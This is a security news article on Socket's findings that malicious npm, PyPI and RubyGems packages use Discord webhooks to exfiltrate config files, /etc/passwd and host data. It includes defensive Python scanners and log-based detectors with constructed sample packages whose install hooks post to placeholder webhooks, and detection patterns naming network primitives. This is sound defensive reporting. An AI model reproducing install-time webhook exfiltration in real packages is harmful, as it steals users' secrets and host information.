Categories: Cyber Security News

Malicious Packages Turn Discord Into Covert C2 Hub Across npm, PyPI, RubyGems

Threat research from Socket has uncovered escalating abuse of Discord webhooks as covert command-and-control (C2) channels within malicious packages distributed across npm, PyPI, and RubyGems.

This technique allows threat actors to exfiltrate sensitive data to attacker-controlled Discord servers without the need for hosting dedicated infrastructure, making detection and prevention significantly more challenging.


Discord webhooks are write-only HTTPS endpoints that accept JSON payloads to post messages to specific channels. Possession of a webhook URL grants full ability to send data, while the endpoint itself does not reveal channel history.

A successful POST returns 204 No Content (or 200 OK with the created message when ?wait=true is appended); an invalid token yields 401 Unauthorized, and 429 Too Many Requests signals rate limiting.

Because webhooks leverage Discord’s trusted domain over TLS, they often bypass firewall controls and blend in with legitimate traffic.

npm, PyPI, and RubyGems Exploitation Patterns

One npm example, mysql-dumpdiscord, uses Node.js to locate configuration files such as config.json, .env, and ayarlar.js (Turkish for “settings”), read their contents, and POST them to a hard-coded Discord webhook.

If a file exceeds 1,900 characters, the script truncates it and appends a “file shortened” message in Turkish. This functions as a simple file exfiltration dropper, but leverages Discord instead of a traditional attacker C2.

A second npm case is a minimal wrapper around discord.js’s WebhookClient, joining arbitrary arguments into a message and silently sending them to an embedded webhook.


While sometimes used for logging, the hard-coded URL allows any data passed to be transmitted externally, making it an easy covert sink for stolen information.

In PyPI, the malinssx package overrides the install command in setup.py to send an encoded message in Vietnamese (“Someone just installed the maladicus package via pip!”) to a hard-coded webhook during installation.


This supply chain attack model silently triggers outbound HTTP requests at install time, before any runtime use, and identical packages (malicus, maliinn) from the same author used the same Discord endpoint.

On RubyGems, the malicious sqlcommenter_rails gem collects extensive host data (username, hostname, public IP via api.ipify.org, DNS servers from /etc/resolv.conf, and the contents of /etc/passwd), formats it into a multi-line message, prints it locally, and sends it to a Discord webhook over TLS using Net::HTTP. Errors are silently suppressed, ensuring stealth.

Defensive Measures and Industry Impact

The low cost and stealth of webhook-based C2 flips supply chain economics in favor of attackers, reducing infrastructure overhead while exploiting trusted domains.

Socket urges enforcing strict egress controls, dependency pinning, and continuous scanning for hard-coded URLs and install-time network calls. Their GitHub App, CLI, and Firewall are designed to detect and block such malicious dependencies before execution.
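One way to implement the scan Socket recommends, as an added example that is not Socket's tooling and not code from any of the packages discussed: a small Python scanner that flags hard-coded Discord webhook URLs, install-time hooks (npm pre/postinstall scripts, a setup.py cmdclass override of install, a gemspec extension) and outbound-network primitives across a package's files, then rates the combination. The sample package contents and the webhook id and token are constructed placeholders; the regexes and hook list are this example's assumptions about what to look for, not an exhaustive rule set.

```python
import re

# Discord webhook URLs have a fixed shape: numeric id, then an opaque token.
# The legacy discordapp.com host and the ptb/canary subdomains are included.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"
)

# Install-time hook indicators by manifest file. Code reached from these runs
# during installation, before anything imports or requires the package.
INSTALL_HOOKS = {
    "package.json": re.compile(r'"(?:pre|post)?install"\s*:'),
    "setup.py": re.compile(r"cmdclass\s*=\s*\{[^}]*['\"]install['\"]"),
    ".gemspec": re.compile(r"\.extensions\s*="),
}

# Outbound-network primitives across the three ecosystems (assumed list; extend as needed).
NETWORK_RE = re.compile(
    r"(?:requests\.(?:post|get)|urllib\.request|urlopen\(|https?\.request\(|"
    r"\bfetch\(|axios|Net::HTTP|WebhookClient|\bcurl\s)"
)


def redact(url):
    """Keep the webhook id for correlation but never log the token."""
    return url.rsplit("/", 1)[0] + "/<redacted>"


def scan_package(files):
    """files maps a relative path to its text. Returns a verdict dict."""
    webhooks, install_hook, network_call, evidence = set(), False, False, []
    for path, text in files.items():
        for suffix, rx in INSTALL_HOOKS.items():
            if path.endswith(suffix) and rx.search(text):
                install_hook = True
                evidence.append(f"{path}: install-time hook")
        if NETWORK_RE.search(text):
            network_call = True
            evidence.append(f"{path}: outbound network primitive")
        for url in WEBHOOK_RE.findall(text):
            webhooks.add(url)
            evidence.append(f"{path}: hard-coded Discord webhook {redact(url)}")
    # A webhook URL next to install-time execution or a network primitive is the
    # pattern described for mysql-dumpdiscord, malinssx and sqlcommenter_rails.
    if webhooks and (install_hook or network_call):
        severity = "high"
    elif webhooks or (install_hook and network_call):
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity,
            "webhooks": sorted(redact(u) for u in webhooks),
            "evidence": evidence}


# Constructed sample packages (not real packages; the webhook id/token are placeholders).
NPM_SUSPECT = {
    "package.json": '{"name": "demo-pkg", "scripts": {"postinstall": "node index.js"}}',
    "index.js": (
        'const { WebhookClient } = require("discord.js");\n'
        'const hook = new WebhookClient({ url: "https://discord.com/api/webhooks/'
        '000000000000000000/FAKE_TOKEN_FOR_TESTING_ONLY" });\n'
    ),
}
PYPI_SUSPECT = {
    "setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "import requests\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        requests.post('https://discord.com/api/webhooks/000000000000000000/"
        "FAKE_TOKEN_FOR_TESTING_ONLY', json={'content': 'installed'})\n"
        "        install.run(self)\n"
        "setup(name='demo', cmdclass={'install': PostInstall})\n"
    ),
}
BENIGN = {
    "package.json": '{"name": "demo-lib", "scripts": {"test": "node test.js"}}',
    "README.md": "Join our community: https://discord.gg/example\n",
}

if __name__ == "__main__":
    for name, files in [("npm-suspect", NPM_SUSPECT), ("pypi-suspect", PYPI_SUSPECT), ("benign", BENIGN)]:
        verdict = scan_package(files)
        print(f"{name}: {verdict['severity']}")
        for line in verdict["evidence"]:
            print("   ", line)
```

The scanner deliberately reports the webhook id but redacts the token, so a finding can be correlated across packages without the detection pipeline itself becoming a place where live webhook credentials are stored. A Discord invite link in a README, as in the benign sample, does not match the webhook pattern and produces no finding.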

As more threat actors pivot to webhook-centered exfiltration, shifting to behavioral analysis over static IOC detection becomes essential to safeguard the software supply chain.
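The behavioral side, as an added example that is not Socket's or any other vendor's product code: rather than matching a known webhook URL, the Python rules below run over constructed egress-log lines from a build host and flag a POST to any Discord webhook from a process spawned by a package manager, a request body too large for a status notification, and a public-IP lookup followed by a webhook post from the same process (the sequence described for sqlcommenter_rails), while an allowlist keeps a legitimate CI notifier quiet. The log format, hostnames, process names, registry and IP-echo host lists, and the allowlist are assumptions for this example.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit

# Hosts a package manager is expected to talk to during an install (assumed list).
REGISTRY_HOSTS = {"pypi.org", "files.pythonhosted.org", "registry.npmjs.org",
                  "rubygems.org", "index.rubygems.org"}
# Package-manager processes; anything they spawn counts as "install context".
INSTALLERS = {"pip", "pip3", "npm", "yarn", "pnpm", "gem", "bundle"}
# Public-IP echo services, the recon step performed before the webhook post.
IP_ECHO_HOSTS = {"api.ipify.org", "ifconfig.me", "icanhazip.com", "checkip.amazonaws.com"}
# (process, parent) pairs allowed to post to Discord webhooks, e.g. a CI notifier (assumed).
ALLOWED_WEBHOOK_POSTERS = {("ci-notify", "systemd")}
NOTIFICATION_MAX_BYTES = 1024


@dataclass
class Event:
    ts: str
    host: str
    proc: str
    parent: str
    method: str
    url: str
    req_bytes: int
    status: int


def parse_line(line):
    """Egress-log format assumed here: ts host process parent method url bytes status."""
    ts, host, proc, parent, method, url, req_bytes, status = line.split()
    return Event(ts, host, proc, parent, method, url, int(req_bytes), int(status))


def in_install_context(ev):
    return ev.proc in INSTALLERS or ev.parent in INSTALLERS


def is_discord_webhook_post(ev):
    parts = urlsplit(ev.url)
    host = parts.hostname or ""
    on_discord = host in ("discord.com", "discordapp.com") or host.endswith((".discord.com", ".discordapp.com"))
    return ev.method == "POST" and on_discord and parts.path.startswith("/api/webhooks/")


def analyze(log_text):
    """Return one alert per suspicious event: {'event': Event, 'reasons': [...]}."""
    alerts = []
    looked_up_ip = set()   # (host, proc, parent) triples that already hit an IP echo service
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        dst = urlsplit(ev.url).hostname or ""
        key = (ev.host, ev.proc, ev.parent)
        reasons = []
        if in_install_context(ev):
            if dst in IP_ECHO_HOSTS:
                looked_up_ip.add(key)
                reasons.append("public-IP lookup during package install")
            elif dst not in REGISTRY_HOSTS and ev.method != "GET":
                reasons.append(f"{ev.method} to non-registry host {dst} during package install")
        if is_discord_webhook_post(ev) and (ev.proc, ev.parent) not in ALLOWED_WEBHOOK_POSTERS:
            reasons.append("POST to a Discord webhook from an unapproved process")
            if key in looked_up_ip:
                reasons.append("preceded by a public-IP lookup from the same process")
            if ev.req_bytes > NOTIFICATION_MAX_BYTES:
                reasons.append(f"request body {ev.req_bytes} bytes, larger than a status notification")
        if reasons:
            alerts.append({"event": ev, "reasons": reasons})
    return alerts


# Constructed sample log (hostnames, processes and the webhook id/token are placeholders).
SAMPLE_LOG = """\
2025-08-01T10:00:01Z build-07 node npm POST https://discord.com/api/webhooks/000000000000000000/FAKE_TOKEN_FOR_TESTING_ONLY 2417 204
2025-08-01T10:00:02Z build-07 pip pip GET https://pypi.org/simple/requests/ 0 200
2025-08-01T10:00:05Z build-07 ruby gem GET https://api.ipify.org/ 0 200
2025-08-01T10:00:06Z build-07 ruby gem POST https://discord.com/api/webhooks/000000000000000000/FAKE_TOKEN_FOR_TESTING_ONLY 5120 204
2025-08-01T10:01:00Z dev-laptop-3 Discord.exe explorer.exe POST https://discord.com/api/v9/channels/1/messages 310 200
2025-08-01T10:02:00Z build-07 npm npm GET https://registry.npmjs.org/lodash 0 200
2025-08-01T10:03:00Z build-07 ci-notify systemd POST https://discord.com/api/webhooks/000000000000000000/FAKE_TOKEN_FOR_TESTING_ONLY 180 204
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        ev = alert["event"]
        print(f"{ev.ts} {ev.host} {ev.proc} (parent {ev.parent}) -> {urlsplit(ev.url).hostname}")
        for reason in alert["reasons"]:
            print("   ", reason)
```

None of these rules depends on knowing the attacker's webhook id or token in advance: a fresh webhook posted to from a child of pip, npm or gem is flagged on the first sighting, the genuine Discord client on a workstation is ignored because it talks to the channels API rather than a webhook endpoint, and the approved notifier passes because its process and parent are on the allowlist.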


The post Malicious Packages Turn Discord Into Covert C2 Hub Across npm, PyPI, RubyGems appeared first on Cyber Security News.
